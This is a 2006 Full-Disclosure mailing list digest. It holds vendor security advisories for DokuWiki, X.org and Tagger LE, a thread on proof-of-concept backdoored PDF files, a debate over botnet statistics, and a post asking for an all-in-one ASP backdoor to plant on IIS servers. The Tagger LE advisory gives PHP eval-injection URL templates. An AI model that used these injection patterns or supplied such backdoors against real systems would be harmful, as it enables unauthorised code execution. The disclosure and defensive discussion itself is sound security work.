http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-xeon_2.6.15.11-4_amd64.deb Size/MD5: 6837510 a12bc36da1ba8df6f3b441c050c41f5c http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-26-amd64-generic-di_2.6.15.11-4_amd64.udeb Size/MD5: 799514 38bdf455f45161a6bc1bca5012f7b0d4 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricte
[Full-disclosure] Good ASP backdoor?
Can anyone suggest a good backdoor for placing on a IIS server when you can upload a file to document root? For exapmle an all-in-one tool with upload, download, command execution, etc. There are several basic ones out there - I was wondering if anyone ever wrote a really spiffy one. Thanks in advance, Mark Lachniet ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backdooring PDF Files
I think it depends on the context. Example 1 (backdoored1.pdf) : On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on mozilla-firefox whitout warning. On Windows XP sp2 with Adobe Reader 7.0.8 sends a warning about open the url. Example 2 (backdoored2.pdf) : On Ubuntu Linux and windows XP sp2 does nothing apparently. it, could be possible to make multi-target attacks :) but other viewers like evince or xpdf don't have any effect :( Regards! On Wed, Sep 13, 2006 at 11:06:55PM +0300, Juha-Matti Laurio wrote: > Proof of Concept for example 1 (backdoored1.pdf) opened with Adobe Reader > 7.0.8 > (i.e. no browser plug-in used) issued a Security Warning dialog box: > > "The document is trying to conenct to the site: > http://www.google.com/owned.html > > If you trust the site click "Allow", otherwise click "Block"." > > Option Remember my action is in use as well. > > When clicking "Allow" this Google page was opened in MSIE (in fact FF is my > default browser, however). > > Am I missing something related to differences between Reader plug-in and > Reader application? > > - Juha-Matti > > > David Kierznowski <[EMAIL PROTECTED]> wrote: > > > >Recently, there has been alot of hype involving backdooring various > >web technologies. pdp (arcitect) has done alot of work centered around > >this area. > > > >I saw Jeremiah Grossman mention PDF's being "BAD", however, I was > >unable to easily locate any practical reasons as to why. I decided to > >investigate this a little further. > > > >This article discusses two possible backdoor techniques for Adobe > >Acrabat Reader and Professional. It includes proof of concept code and > >backdoored PDF documents. > > > >The article can be found here: > >http://michaeldaw.org/ > > > >___ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > > > --- > This list is sponsored by: Norwich University > > EARN A MASTER OF SCIENCE IN INFORMATION ASSURANCE - ONLINE > The NSA has designated Norwich University a center of Academic Excellence > in Information Security. Our program offers unparalleled Infosec management > education and the case study affords you unmatched consulting experience. > Using interactive e-Learning technology, you can earn this esteemed degree, > without disrupting your career or home life. > > http://www.msia.norwich.edu/secfocus > --- -- Hugo Francisco González Robledo Instituto Tecnológico de San Luis Potosí Llave pública en http://www.honeynet.org.mx Llave pública en http://ardilla.zapto.org Preguntale a Google-Earth donde estoy : http://ardilla.zapto.org/ubicaHugo.kml --- Educación es lo que queda después de olvidar lo que se ha aprendido en la escuela. Albert Einstein --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] the world of botnets article and wrong numbers
Gadi Evron wrote: > Numbers... > I can't speak for others, but I can try to answer better than I did > on the botnets mailing list on whitestar. > > On individual honey nets, even rather large ones, the number of unique > samples often assembled can be somewhere between 200 and 800 > a month.. depending on how wide it is spread and the networks it sits > on. Which is why many of us cooperate. > >> From cumulative honey nets monitoring of such smaller (yet very > effective) nets, and some larger nets, we get to a number of about > 15K new bot samples every month (Alan Solomon and myself wrote 12K, > so we underplayed it a bit due to statistics being a bit shaky). So > the real avg number is somewhere around 15K new unique samples a > month. Can you go into detail about the methodology you're using here? How do you "get to a number" of 15,000 from a number "between 200 and 800"? Is this a statistical extrapolation, or are you saying that your honeynet gets 200 to 800 unique samples a month, and so does that one over there, and that one, and that one and they all add up to 15000? Do you attempt to correct for variants that are simply re-packed using a different compressor, or other trivial changes? Do you attempt to correct for complex polymorphic variants? > Further, the anti virus world sees about the same numbers. > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of > 15K avg bot samples a month, as well. Got a link/quote/reference to that? Does Ziv explain the methodology that they are using? > I don't know what others may be seeing, but this is our best estimate > as to what's going on with the number of unique samples released > every month. > > Jose Nazarijo from Arbor replied on the botnets list that he sees > similar numbers. > > I hope this helps... what are you looking to hear? Some kind of explanation for the huge disjunction between these numbers and our instinctive ideas about what's possible. Of course, being un-worked-out intuitive estimates, such ideas are of course entirely likely to be off the mark, but off the mark by two orders of magnitude? Hence the request for more methodological details. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200609-10 ] DokuWiki: Arbitrary command execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200609-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: DokuWiki: Arbitrary command execution Date: September 14, 2006 Bugs: #146800 ID: 200609-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Vulnerabilities in some accessory scripts of DokuWiki allow remote code execution. Background == DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 www-apps/dokuwiki < 20060309d >= 20060309d Description === "rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR HTTP header, allowing the injection of arbitrary contents - such as PHP commands - into a file. Additionally, the accessory scripts installed in the "bin" DokuWiki directory are vulnerable to directory traversal attacks, allowing to copy and execute the previously injected code. Impact == A remote attacker may execute arbitrary PHP (and thus probably system) commands with the permissions of the user running the process serving DokuWiki pages. Workaround == Disable remote access to the "bin" subdirectory of the DokuWiki installation. Remove the directory if you don't use the scripts in there. Resolution == All DokuWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20060309d" References == [ 1 ] CVE-2006-4674 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4674 [ 2 ] CVE-2006-4675 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4675 [ 3 ] CVE-2006-4679 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4679 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200609-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpX0ZWtgxl1j.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] the world of botnets article and wrong numbers
On 9/14/06, 3APA3A <[EMAIL PROTECTED]> wrote: Dear Toby McKay,Number of 12000 is absolutely impossible. Actual number is much higher.i agree its impossible! but on samples (actual bot samples)! ip addresses are a different ridiculous number gadi mentions. he said in the article there is 3.5 MILLIONS unique ip addresses used every day in spam where does he come with these ridiculous numbers?he says 'spam alone'... saying there is much more ip for botnets not in spam. Let's look on daily statistics for messages rejected as SPAM on my mailsystem. Month statistics requires to much information to be processed,sorry.On August, 13 150419 messages from 24244 unique IPs On September, 12 160054 messages from 32882 unique IPsOn September, 13 175573 messages from 35834 unique IPsNew hosts between August, 13 and September, 13: 34952 (97%)New hosts between September, 12 and September, 13: 27988 (78%) In suggestion average lifetime of spamming IP is higher than 1 day, wecan approximate number of spamming IPs on the whole net during one dayas 15 with 40% rotation within 1 week. That is 24 new IPs every month. The problem is, most of these IPs are dynamic. So, we have todivide this number on average number of IPs infected host had duringinfection period. It's impossible to discover this number. My expert's mark is 3-5. That is, we have 5-8 new spamming bots every monthwith average life of 2 weeks. Looks reasonable, but again it's takenfrom nowhere. And we only counted bots used for spamming :) --Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk:TM> hi guysTM> i ask gadi on the botnets listserv on where he got the number 12K for bots TM> every month on his the world of botnets article [TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave TM> no real answer.TM> does that number sound right to anybody? where did you come up with it gadi?TM> ./mcktoby--~/ZARAZAYou know my name - look up my number (Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RSA SecurID SID800 Token vulnerable by design
Right. Long-winded, but right. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] the world of botnets article and wrong numbers
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote: > hi guys> i ask gadi on the botnets listserv on where he got the number 12K for> bots every month on his the world of botnets article [> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdfYou did..> ] .. he gave no real answer.> does that number sound right to anybody? where did you come up with it> gadi? First, the link I prefer people use is the one on my blog at securiteam,as it holds the copyright notice for Virus Bulletin, under which I wasallowed to host the article: http://blogs.securiteam.com/index.php/archives/593Numbers...I can't speak for others, but I can try to answer better than I did on thebotnets mailing list on whitestar.On individual honey nets, even rather large ones, the number of unique samples often assembled can be somewhere between 200 and 800a month.. depending on how wide it is spread and the networks it sitson. Which is why many of us cooperate.>From cumulative honey nets monitoring of such smaller (yet very effective) nets, and some larger nets, we get to a number of about 15K newbot samples every month (Alan Solomon and myself wrote 12K, so weunderplayed it a bit due to statistics being a bit shaky). So the real avg number is somewhere around 15K new unique samples a month.Further, the anti virus world sees about the same numbers.The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15Kavg bot samples a month, as well. I don't know what others may be seeing, but this is our best estimate asto what's going on with the number of unique samples released every month.Jose Nazarijo from Arbor replied on the botnets list that he sees similar numbers.I hope this helps... what are you looking to hear?Gadi.can you show samples for a month? can you show them as being real or in you rmind? >> ./mcktoby___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:164 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:164 http://www.mandriva.com/security/ ___ Package : xorg-x11 Date: September 14, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Local exploitation of an integer overflow vulnerability in the 'CIDAFM()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3739). Local exploitation of an integer overflow vulnerability in the 'scan_cidfont()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3740). Updated packages are patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3739 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3740 ___ Updated Packages: Mandriva Linux 2006.0: 870f66da912af0a4fad28efb9b88c90e 2006.0/RPMS/libxorg-x11-6.9.0-5.10.20060mdk.i586.rpm 0a8ff15caa27d78680f54486c67737e6 2006.0/RPMS/libxorg-x11-devel-6.9.0-5.10.20060mdk.i586.rpm e66de8e6c72f5b47ea0b56e32d75e46e 2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.10.20060mdk.i586.rpm 4520ffe2166ef729c9b717571a0f858e 2006.0/RPMS/X11R6-contrib-6.9.0-5.10.20060mdk.i586.rpm 2288439bb004dfc1cbb9b1e1463a8e8a 2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mdk.i586.rpm 278c8e53603e73b09877d6939d29d281 2006.0/RPMS/xorg-x11-6.9.0-5.10.20060mdk.i586.rpm 6dd626b751c738c91f5a60fbabe1f3ca 2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mdk.i586.rpm a166e90cc89070fb053aec43c96bd9de 2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mdk.i586.rpm 46941ea873fd4a47b43e32517671ba8d 2006.0/RPMS/xorg-x11-doc-6.9.0-5.10.20060mdk.i586.rpm 45f99f735dcac5987c0bcf0bcdf86456 2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.10.20060mdk.i586.rpm dd6d86b93bdd5742674cfb3c49260542 2006.0/RPMS/xorg-x11-server-6.9.0-5.10.20060mdk.i586.rpm f97eb010ee04a03365607e952d0cb3be 2006.0/RPMS/xorg-x11-xauth-6.9.0-5.10.20060mdk.i586.rpm 103b774cb9a79c0adaf4c5949b9269ca 2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.10.20060mdk.i586.rpm ee5ba6d107047df4552cc06e0e0d9932 2006.0/RPMS/xorg-x11-xfs-6.9.0-5.10.20060mdk.i586.rpm 4734479179fc2b8df8a9383123cbe43d 2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.10.20060mdk.i586.rpm 5aa7daf002ee73a61d719c318cc7fb0f 2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.10.20060mdk.i586.rpm 399f003f1545c4a6f003f26f197264f6 2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.10.20060mdk.i586.rpm d76d29e580eaea46f06e9031c4678a16 2006.0/SRPMS/xorg-x11-6.9.0-5.10.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 44500ad48fab3741a6cd201e3e0c8e44 x86_64/2006.0/RPMS/lib64xorg-x11-6.9.0-5.10.20060mdk.x86_64.rpm 873c4f00872045e369d68b6c6bf0e9f4 x86_64/2006.0/RPMS/lib64xorg-x11-devel-6.9.0-5.10.20060mdk.x86_64.rpm cf34abe58bce0f1cb39d279c1825f28d x86_64/2006.0/RPMS/lib64xorg-x11-static-devel-6.9.0-5.10.20060mdk.x86_64.rpm 870f66da912af0a4fad28efb9b88c90e x86_64/2006.0/RPMS/libxorg-x11-6.9.0-5.10.20060mdk.i586.rpm 0a8ff15caa27d78680f54486c67737e6 x86_64/2006.0/RPMS/libxorg-x11-devel-6.9.0-5.10.20060mdk.i586.rpm e66de8e6c72f5b47ea0b56e32d75e46e x86_64/2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.10.20060mdk.i586.rpm ea646502e846d806b676425d73489bc6 x86_64/2006.0/RPMS/X11R6-contrib-6.9.0-5.10.20060mdk.x86_64.rpm bb96282af5687aec3e671c5c6b715162 x86_64/2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mdk.x86_64.rpm 9554339037de4d0ca8decaf3030b94c1 x86_64/2006.0/RPMS/xorg-x11-6.9.0-5.10.20060mdk.x86_64.rpm e03bf5aaffd4ff3d918226069404c88c x86_64/2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mdk.x86_64.rpm 9cb232babce28cf0a9c9dbc3542c632a x86_64/2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mdk.x86_64.rpm 56ec5996265c951aee954105c3227809 x86_64/2006.0/RPMS/xorg-x11-doc-6.9.0-5.10.20060mdk.x86_64.rpm 900e0f2251e6c81afcc37a2c585720d7 x86_64/2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.10.20060mdk.x86_64.rpm e0f617bd52b0d50aa78a8b70316922cf x86_64/2006.0/RPMS/xorg-x11-server-6.9.0-5.10.20060mdk.x86_64.rpm e6610f07a1424051b95059afe5beb385 x86_64/2006.0/RPMS/xorg-x11-xauth-6.9.0-5.10.20060mdk.x86_64.rpm 05bfc5d4703ca7f181cf7b57c4569e4a x86_64/2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.10.20060mdk.x86_64.rpm 169612fa75a90697f98372aa87185cb7 x86_64/2006.0/RPMS/xorg-x11-xfs-6.9.0-5.10.20060mdk.x86_64.rpm 51cda78610735e801d8b5d53043b831f x86_64/2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.10.20060mdk.x86_64.rpm 1b8416070f1ef2d307e5d00a3af8773b x86_64/2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.10.2
Re: [Full-disclosure] the world of botnets article and wrong numbers
Dear Toby McKay, Number of 12000 is absolutely impossible. Actual number is much higher. Let's look on daily statistics for messages rejected as SPAM on my mail system. Month statistics requires to much information to be processed, sorry. On August, 13 150419 messages from 24244 unique IPs On September, 12 160054 messages from 32882 unique IPs On September, 13 175573 messages from 35834 unique IPs New hosts between August, 13 and September, 13: 34952 (97%) New hosts between September, 12 and September, 13: 27988 (78%) In suggestion average lifetime of spamming IP is higher than 1 day, we can approximate number of spamming IPs on the whole net during one day as 15 with 40% rotation within 1 week. That is 24 new IPs every month. The problem is, most of these IPs are dynamic. So, we have to divide this number on average number of IPs infected host had during infection period. It's impossible to discover this number. My expert's mark is 3-5. That is, we have 5-8 new spamming bots every month with average life of 2 weeks. Looks reasonable, but again it's taken from nowhere. And we only counted bots used for spamming :) --Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk: TM> hi guys TM> i ask gadi on the botnets listserv on where he got the number 12K for bots TM> every month on his the world of botnets article [ TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave TM> no real answer. TM> does that number sound right to anybody? where did you come up with it gadi? TM> ./mcktoby -- ~/ZARAZA You know my name - look up my number (Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] the world of botnets article and wrong numbers
> hi guys > i ask gadi on the botnets listserv on where he got the number 12K for > bots every month on his the world of botnets article [ > http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf You did.. > ] .. he gave no real answer. > does that number sound right to anybody? where did you come up with it > gadi? First, the link I prefer people use is the one on my blog at securiteam, as it holds the copyright notice for Virus Bulletin, under which I was allowed to host the article: http://blogs.securiteam.com/index.php/archives/593 Numbers... I can't speak for others, but I can try to answer better than I did on the botnets mailing list on whitestar. On individual honey nets, even rather large ones, the number of unique samples often assembled can be somewhere between 200 and 800 a month.. depending on how wide it is spread and the networks it sits on. Which is why many of us cooperate. >From cumulative honey nets monitoring of such smaller (yet very effective) nets, and some larger nets, we get to a number of about 15K new bot samples every month (Alan Solomon and myself wrote 12K, so we underplayed it a bit due to statistics being a bit shaky). So the real avg number is somewhere around 15K new unique samples a month. Further, the anti virus world sees about the same numbers. The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K avg bot samples a month, as well. I don't know what others may be seeing, but this is our best estimate as to what's going on with the number of unique samples released every month. Jose Nazarijo from Arbor replied on the botnets list that he sees similar numbers. I hope this helps... what are you looking to hear? Gadi. > > ./mcktoby ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backdooring PDF Files
On 9/14/06, Geo. <[EMAIL PROTECTED]> wrote: > > POC did nothing for my Foxit PDF reader. No www-page was opened and no > > script was executed. Maybe you folks should just dump the clumsy and > > insecure Acrobat Reader and move onto something better for reading .pdf > > documents? ;) > > Good suggestion but foxit doesn't allow typing into pdf form fields. > > Geo. (I'd use it if it weren't for that shortcomming) Have you tried GhostScript and GhostView? http://www.cs.wisc.edu/~ghost/ -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] the world of botnets article and wrong numbers
hi guysi ask gadi on the botnets listserv on where he got the number 12K for bots every month on his the world of botnets article [http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf ] .. he gave no real answer.does that number sound right to anybody? where did you come up with it gadi?./mcktoby ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Search API Worms
http://www.gnucitizen.org/blog/google-search-api-worms The service that concerns me the most is Google AJAX Search API, the new JavaScript powered search widget. In this article I cover the potential problems with Google AJAX Search API and how it can be used by web worms to propagate. -- pdp (architect) http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backdooring PDF Files
> POC did nothing for my Foxit PDF reader. No www-page was opened and no > script was executed. Maybe you folks should just dump the clumsy and > insecure Acrobat Reader and move onto something better for reading .pdf > documents? ;) Good suggestion but foxit doesn't allow typing into pdf form fields. Geo. (I'd use it if it weren't for that shortcomming) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities
== Secunia Research 14/09/2006 - Tagger LE PHP "eval()" Injection Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerabilities...4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software Tagger LE latest version (product has no version information). Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System Access Where: From Remote == 3) Vendor's Description of Software Tagger LE is a tagboard (mini message board) that will add visitor interactivity with your website and a form of communication to one and another. Tagger's many features include an Administration panel, IP Banning, Smart Auto Refresh, Smilies, Imposter prevention, and more. A perfect addition to a website lacking interactivity. This solution uses a Flat File Database (MySQL is not required). Product link: http://www.venturenine.com/ == 4) Description of Vulnerabilities Secunia Research has discovered some vulnerabilities in Tagger LE, which can be exploited by malicious people to compromise a vulnerable system. Input passed via the query string in tags.php, sign.php, and admin/index.php isn't properly sanitised before being used in an "eval()" call. This can be exploited to inject and execute arbitrary PHP code via a specially crafted parameter name or value. Examples: http://[host]/tags.php?foo=%22.[code].%22 http://[host]/sign.php?foo=%22.[code].%22 http://[host]/admin/index.php?foo=%22.[code].%22 http://[host]/taggerLE/tags.php?foo;[code];$foo=foo http://[host]/taggerLE/sign.php?foo;[code];$foo=foo http://[host]/admin/index.php?foo;[code];$foo=foo == 5) Solution Edit the source code to ensure that input is properly sanitised. == 6) Time Table 30/08/2006 - Initial vendor notification. 13/09/2006 - Final reminder. 14/09/2006 - Public disclosure. == 7) Credits Discovered by Andreas Sandblad, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-4437 for the vulnerabilities. == 9) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-62/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/